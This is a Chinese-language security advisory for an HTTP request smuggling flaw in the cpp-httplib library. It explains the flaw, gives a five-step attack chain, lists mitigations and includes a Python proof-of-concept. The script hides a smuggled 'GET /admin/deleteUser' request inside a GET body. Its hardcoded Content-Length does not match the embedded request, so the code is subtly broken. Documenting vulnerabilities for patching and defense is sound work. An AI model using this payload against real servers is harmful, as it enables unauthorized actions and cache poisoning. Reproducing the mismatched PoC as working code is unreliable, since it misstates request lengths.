CVE-2026-34441 cpp-httplib HTTP请求走私漏洞

漏洞信息

漏洞编号

CVE-2026-34441

漏洞类型

HTTP请求走私

CVSS评分

4.8 中危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

cpp-httplib

漏洞概述

cpp-httplib是一个C++11单文件跨平台HTTP/HTTPS库。在0.40.0版本之前，该库存在HTTP请求走私漏洞。漏洞产生原因是服务器的静态文件处理程序在处理GET请求时，未消耗请求体。在HTTP/1.1长连接环境下，未读取的请求体字节数据保留在TCP流中，并被服务器解释为下一个新HTTP请求的开始。攻击者可以在GET请求体中嵌入任意HTTP请求，服务器会将其作为单独的请求进行处理。该问题已在0.40.0版本中修复。

技术细节

该漏洞属于HTTP请求走私（HTTP Request Smuggling）的一种变体，其核心在于HTTP协议解析过程中对请求边界的处理不一致。在受影响的cpp-httplib版本中，当服务器接收到包含Content-Length头部的GET请求且目标为静态文件时，服务器逻辑直接响应文件内容，而忽略了读取并丢弃请求体中的数据。由于HTTP/1.1支持持久连接，TCP连接不会立即关闭。攻击者可以构造一个特殊的GET请求，设置Content-Length为一个特定值，并在请求体中写入精心构造的恶意HTTP请求。服务器处理完第一个GET请求后，由于未读取请求体，剩余的数据（即恶意请求）仍然停留在TCP缓冲区中。当服务器等待下一个请求时，它会读取缓冲区中残留的数据，误以为这是客户端发送的新请求，从而执行攻击者预期的操作，可能导致缓存投毒或绕过安全检查。

攻击链分析

STEP 1

步骤1

攻击者与目标服务器建立TCP连接，并发送一个针对静态文件的GET请求。

STEP 2

步骤2

攻击者在GET请求中设置Content-Length头部，并在请求体中插入恶意的第二个HTTP请求（例如访问管理接口的请求）。

STEP 3

步骤3

服务器处理GET请求，返回静态文件内容，但根据漏洞逻辑，未读取并丢弃请求体中的数据。

STEP 4

步骤4

由于Keep-Alive连接保持开启，TCP流中残留的恶意请求数据未被清空。

STEP 5

步骤5

服务器从TCP流中读取下一批数据时，将攻击者嵌入的请求体误认为是新的HTTP请求并执行，导致攻击成功。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import socket
import time

def send_smuggling_attack(host, port, static_file_path):
    # Construct the malicious request
    # First request: GET request for a static file with a body containing the second request
    smuggled_request = (
        f"GET {static_file_path} HTTP/1.1\r\n"
        f"Host: {host}\r\n"
        f"Content-Length: 65\r\n"
        f"Connection: keep-alive\r\n"
        f"\r\n"
        f"GET /admin/deleteUser HTTP/1.1\r\n"
        f"Host: {host}\r\n"
        f"\r\n"
    )

    print(f"[*] Sending smuggling payload to {host}:{port}...")
    
    # Create a TCP socket
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.connect((host, port))
    
    # Send the payload
    s.sendall(smuggled_request.encode())
    
    # Receive response for the first request (the static file)
    response1 = s.recv(4096).decode()
    print("[*] Received first response (likely 200 OK for static file):")
    print(response1.split('\r\n\r\n')[0])
    
    # Wait a moment to simulate the server processing the next request from the stream
    time.sleep(1)
    
    # The server might have already processed the second request, 
    # or we might need to send another simple request to trigger the parsing of the buffered data,
    # depending on the exact server implementation behavior.
    # In this specific scenario (cpp-httplib), the server reads the next request from the socket immediately.
    
    # Try to receive the response of the smuggled request
    # Note: This might block if the server doesn't send a response immediately or requires another trigger
    try:
        s.settimeout(2)
        response2 = s.recv(4096).decode()
        print("[*] Received second response (Smuggled request response):")
        print(response2)
    except socket.timeout:
        print("[*] No immediate response received for the smuggled request (might have been processed internally).")
    
    s.close()

if __name__ == "__main__":
    # Example usage
    # Replace with actual vulnerable server details
    TARGET_HOST = "127.0.0.1"
    TARGET_PORT = 8080
    TARGET_FILE = "/index.html"
    
    # Warning: Only run this against a server you have permission to test.
    # send_smuggling_attack(TARGET_HOST, TARGET_PORT, TARGET_FILE)
    print("PoC script generated for CVE-2026-34441.")

影响范围

cpp-httplib < 0.40.0

防御指南

临时缓解措施

如果无法立即升级，建议在反向代理（如Nginx）或负载均衡器层面配置严格的上游请求处理，确保转发给后端cpp-httplib服务的请求体被完整读取或丢弃。同时，可以暂时禁用HTTP/1.1 Keep-Alive连接功能，强制每个请求使用新的TCP连接，从而阻断走私攻击的路径。